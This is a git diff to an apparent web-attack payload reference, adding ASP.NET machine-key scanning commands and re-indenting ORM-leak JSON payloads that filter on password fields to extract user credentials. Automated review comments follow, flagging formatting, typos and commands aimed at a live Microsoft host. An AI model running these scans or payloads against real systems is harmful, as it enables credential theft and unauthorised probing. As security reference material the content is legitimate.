diff --git a/API Key Leaks/IIS-Machine-Keys.md b/API Key Leaks/IIS-Machine-Keys.md index 818662a8..22fcddac 100644 --- a/API Key Leaks/IIS-Machine-Keys.md +++ b/API Key Leaks/IIS-Machine-Keys.md @@ -92,6 +92,16 @@ Try multiple machine keys from known products, Microsoft documentation, or other validationKey: C50B3C89CB21F4F1422FF158A5B42D0E8DB8CB5CDA1742572A487D9401E3400267682B202B746511891C1BAF47F8D25C07F6C39A104696DB51F17C529AD3CABE validationAlgo: SHA1 ``` +* [irsdl/crapsecrets](https://github.com/irsdl/crapsecrets) + + ```ps1 + python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -r + python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -mrd 5 + python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -u http://update.microsoft.com/ + python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -u http://192.168.6.22:8080/ + python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -mkf ./crapsecrets/resources/aspnet_machinekeys.txt -u http://192.168.6.22:8080/a1/b/c1/ + ``` + * [NotSoSecure/Blacklist3r](https://github.com/NotSoSecure/Blacklist3r) ```powershell diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index c500392f..71101bd8 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md 
@@ -13,14 +13,15 @@ ## Tools -- [aquasecurity/trivy](https://github.com/aquasecurity/trivy) - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets -- [blacklanternsecurity/badsecrets](https://github.com/blacklanternsecurity/badsecrets) - A library for detecting known or weak secrets on across many platforms -- [d0ge/sign-saboteur](https://github.com/d0ge/sign-saboteur) - SignSaboteur is a Burp Suite extension for editing, signing, verifying various signed web tokens +- [aquasecurity/trivy](https://github.com/aquasecurity/trivy) - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets. +- [blacklanternsecurity/badsecrets](https://github.com/blacklanternsecurity/badsecrets) - A library for detecting known or weak secrets on across many platforms. +- [irsdl/crapsecrets](https://github.com/irsdl/crapsecrets) - A library for detecting known secrets across many web frameworks. +- [d0ge/sign-saboteur](https://github.com/d0ge/sign-saboteur) - SignSaboteur is a Burp Suite extension for editing, signing, verifying various signed web tokens. - [mazen160/secrets-patterns-db](https://github.com/mazen160/secrets-patterns-db) - Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more. 
-- [momenbasel/KeyFinder](https://github.com/momenbasel/KeyFinder) - is a tool that let you find keys while surfing the web -- [streaak/keyhacks](https://github.com/streaak/keyhacks) - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid -- [trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) - Find credentials all over the place -- [projectdiscovery/nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) - Use these templates to test an API token against many API service endpoints +- [momenbasel/KeyFinder](https://github.com/momenbasel/KeyFinder) - is a tool that let you find keys while surfing the web. +- [streaak/keyhacks](https://github.com/streaak/keyhacks) - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. +- [trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) - Find credentials all over the place. +- [projectdiscovery/nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) - Use these templates to test an API token against many API service endpoints. ```powershell nuclei -t token-spray/ -var token=token_list.txt diff --git a/ORM Leak/README.md b/ORM Leak/README.md index 1ebcd988..c14ace88 100644 --- a/ORM Leak/README.md +++ b/ORM Leak/README.md @@ -36,8 +36,8 @@ The ORM provides operators for matching parts of a value. These operators can ut ```json { - "username": "admin", - "password__startswith": "p" + "username": "admin", + "password__startswith": "p" } ``` @@ -63,7 +63,7 @@ Filtering through user that created an article, and having a password containing ```json { - "created_by__user__password__contains": "p" + "created_by__user__password__contains": "p" } ``` 
@@ -79,8 +79,8 @@ Use multiple filters in the same request: ```json { - "created_by__departments__employees__user__username__startswith": "p", - "created_by__departments__employees__user__id": 1 + "created_by__departments__employees__user__username__startswith": "p", + "created_by__departments__employees__user__id": 1 } ``` @@ -118,7 +118,7 @@ Example of an ORM leak in Node.JS with Prisma. ```js const posts = await prisma.article.findMany({ - where: req.query.filter as any // Vulnerable to ORM Leaks + where: req.query.filter as any // Vulnerable to ORM Leaks }) ``` @@ -126,11 +126,11 @@ Use the include to return all the fields of user records that have created an ar ```json { - "filter": { - "include": { - "createdBy": true - } + "filter": { + "include": { + "createdBy": true } + } } ``` @@ -138,15 +138,15 @@ Select only one field ```json { - "filter": { + "filter": { + "select": { + "createdBy": { "select": { - "createdBy": { - "select": { - "password": true - } - } + "password": true } + } } + } } ``` @@ -160,37 +160,37 @@ Select only one field ```json { - "query": { - "createdBy": { - "departments": { + "query": { + "createdBy": { + "departments": { + "some": { + "employees": { + "some": { + "departments": { "some": { - "employees": { + "employees": { + "some": { + "departments": { "some": { - "departments": { - "some": { - "employees": { - "some": { - "departments": { - "some": { - "employees": { - "some": { - "{fieldToLeak}": { - "startsWith": "{testStartsWith}" - } - } - } - } - } - } - } - } + "employees": { + "some": { + "{fieldToLeak}": { + "startsWith": "{testStartsWith}" + } } + } } + } } + } } + } } + } } + } } + } } ``` 
@@ -227,6 +227,7 @@ Only in Ransack < `4.0.0`. * [ORM Injection - HackTricks - July 30, 2024](https://book.hacktricks.xyz/pentesting-web/orm-injection) * [ORM Leak Exploitation Against SQLite - Louis Nyffenegger - July 30, 2024](https://pentesterlab.com/blog/orm-leak-with-sqlite3) +* [ORM Leaking More Than You Joined For - Alex Brown - December 18, 2025](https://www.elttam.com/blog/leaking-more-than-you-joined-for/) * [plORMbing your Django ORM - Alex Brown - June 24, 2024](https://www.elttam.com/blog/plormbing-your-django-orm/) * [plORMbing your Prisma ORM with Time-based Attacks - Alex Brown - July 9, 2024](https://www.elttam.com/blog/plorming-your-primsa-orm/) * [QuerySet API reference - Django - August 8, 2024](https://docs.djangoproject.com/en/5.1/ref/models/querysets/) diff --git a/SAML Injection/README.md b/SAML Injection/README.md index 8bcca624..a7e4bb91 100644 --- a/SAML Injection/README.md +++ b/SAML Injection/README.md @@ -17,6 +17,7 @@ ## Tools * [CompassSecurity/SAMLRaider](https://github.com/SAMLRaider/SAMLRaider) - SAML2 Burp Extension. +* [d0ge/XSW](https://github.com/d0ge/XSW) - XML Signature Wrapping Burp Suite Extensions. * [ZAP Addon/SAML Support](https://www.zaproxy.org/docs/desktop/addons/saml-support/) - Allows to detect, show, edit, and fuzz SAML requests. ## Methodology
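Review bot: the new crapsecrets block in `API Key Leaks/IIS-Machine-Keys.md` is fenced as ```ps1 but every line is a `python3 ./crapsecrets/examples/cli.py ...` invocation; tag it ```bash (or ```powershell, which is what the Blacklist3r block right after it uses) so the highlighting matches the content. The first three examples point the tool at `http://update.microsoft.com/`, a live third-party host; use the same lab-style target the later lines already use (`http://192.168.6.22:8080/`) or a placeholder, so that a reader who copy-pastes does not start probing Microsoft. The flags `-r`, `-mrd 5`, `-avsk`, `-fvsp` and `-mkf` appear with no explanation; a one-line gloss per flag, plus a note that the last command passes `-mkf` twice to load both a local list and the bundled `aspnet_machinekeys.txt` (assuming the CLI accepts the option repeatedly), would make the examples usable without reading the tool's source.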
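Review bot: the crapsecrets entry added to `API Key Leaks/README.md` is nearly indistinguishable from the badsecrets line directly above it ("A library for detecting known or weak secrets on across many platforms" vs "A library for detecting known secrets across many web frameworks"); say what distinguishes the two, or at least mention that crapsecrets is the one now demonstrated in `IIS-Machine-Keys.md`, so readers know why both are listed. Since the hunk already rewrites these lines to add trailing periods, fix the typos in the same pass: "on across many platforms" -> "across many platforms" (badsecrets) and "is a tool that let you find keys" -> "lets you find keys" (KeyFinder). Ordering: the list is alphabetical by owner up to trufflesecurity, so `irsdl/crapsecrets` belongs after `d0ge/sign-saboteur`, not before it.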
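Review bot: the `ORM Leak/README.md` hunks at -36, -63, -79, -118, -126, -138 and -160 are whitespace-only re-indentation of JSON and JS inside fenced blocks (4-space to 2-space) mixed into a commit whose substantive changes are new tools and a reference; putting the re-indent in its own commit keeps `git blame` useful for the payloads. Confirm with `git diff -w` that every one of these hunks disappears, i.e. that no non-whitespace character changed. The -160 Prisma payload is nested nine levels deep and was clearly re-indented by hand, so run the `+` side through a JSON parser (`python3 -m json.tool`) to check the braces still balance; the `{fieldToLeak}` / `{testStartsWith}` placeholders are quoted strings, so the block should parse as-is.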
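Review bot: the added reference title "ORM Leaking More Than You Joined For" does not match its URL slug `leaking-more-than-you-joined-for`; confirm the post's actual title, since the "ORM" prefix looks like it was added to keep the entry next to the other "ORM ..." lines, and if the real title is "Leaking More Than You Joined For" it should be filed under L in this alphabetical list. The date "December 18, 2025" should be the post's publication date, matching how the neighbouring elttam entries ("plORMbing your Django ORM - June 24, 2024", "... Prisma ORM ... - July 9, 2024") are dated.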
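Review bot: "XML Signature Wrapping Burp Suite Extensions" in `SAML Injection/README.md` should be singular ("Extension"), since the link points at one repo and the neighbouring entries describe each tool as a single noun phrase ("SAML2 Burp Extension"). While this list is being touched, the line above labels the link `CompassSecurity/SAMLRaider` but the URL is `github.com/SAMLRaider/SAMLRaider`; the label and the URL disagree, so one of them needs updating.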